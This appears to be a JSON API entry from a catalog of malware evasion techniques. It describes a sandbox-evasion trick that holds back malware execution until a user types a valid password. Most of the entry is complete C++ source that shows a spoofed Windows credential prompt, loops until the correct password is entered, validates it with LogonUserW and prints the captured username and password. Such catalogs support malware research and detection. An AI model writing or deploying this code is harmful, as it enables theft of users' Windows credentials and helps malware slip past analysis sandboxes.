GET /api/techniques/174/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "User Interaction (Are you human?)",
    "category": [
        "https://search.unprotect.it/api/categories/1/"
    ],
    "description": "You can get an advantage against sandboxes by using user interaction techniques. For example, The average user has a username and password and as long as the user you are targeting does not enter their password correctly, you can prevent your malware execution and bypass the possible sandbox control.",
    "resources": "https://github.com/hlldz/pickl3",
    "tags": "",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/14/",
            "technique": "https://search.unprotect.it/api/techniques/174/",
            "description": "",
            "plain_code": "#include <Windows.h>\r\n#include <tchar.h>\r\n#include <CommCtrl.h>\r\n#include <wincred.h>\r\n#include <iostream>\r\n#include <atlstr.h>\r\n\r\n#pragma comment(lib, \"comctl32.lib\")\r\n#pragma comment(lib, \"Credui.lib\")\r\n\r\nvoid pickl3() {\r\n\r\n\tBOOL loginStatus = FALSE;\r\n\tdo {\r\n\t\tCREDUI_INFOW credui = {};\r\n\t\tcredui.cbSize = sizeof(credui);\r\n\t\tcredui.hwndParent = nullptr;\r\n\t\t//credui.pszMessageText = L\"...\";\r\n\t\tcredui.pszCaptionText = L\"Please verify your Windows user credentials to proceed.\";\r\n\t\tcredui.hbmBanner = nullptr;\r\n\r\n\t\tULONG authPackage = 0;\r\n\t\tLPVOID outCredBuffer = nullptr;\r\n\t\tULONG outCredSize = 0;\r\n\t\tBOOL save = false;\r\n\t\tDWORD err = 0;\r\n\r\n\t\terr = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);\r\n\t\tif (err == ERROR_SUCCESS) {\r\n\t\t\tWCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tDWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;\r\n\t\t\tDWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;\r\n\t\t\tDWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;\r\n\t\t\tCredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);\r\n\r\n\t\t\tWCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tCredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);\r\n\r\n\t\t\tHANDLE handle = nullptr;\r\n\t\t\tloginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);\r\n\r\n\r\n\t\t\tif (loginStatus == TRUE) {\r\n\t\t\t\tCloseHandle(handle);\r\n\t\t\t\tstd::wcout << \"\\n[+] Valid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tstd::wcout << \"\\n[-] Invalid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tloginStatus = FALSE;\r\n\t\t\t}\r\n\t\t}\r\n\t} while (loginStatus == FALSE);\r\n}\r\n\r\n\r\n\r\nint main () {\r\n\t\r\n\tpickl3();\r\n\treturn 0;\r\n}"
        }
    ],
    "detection_rules": []
}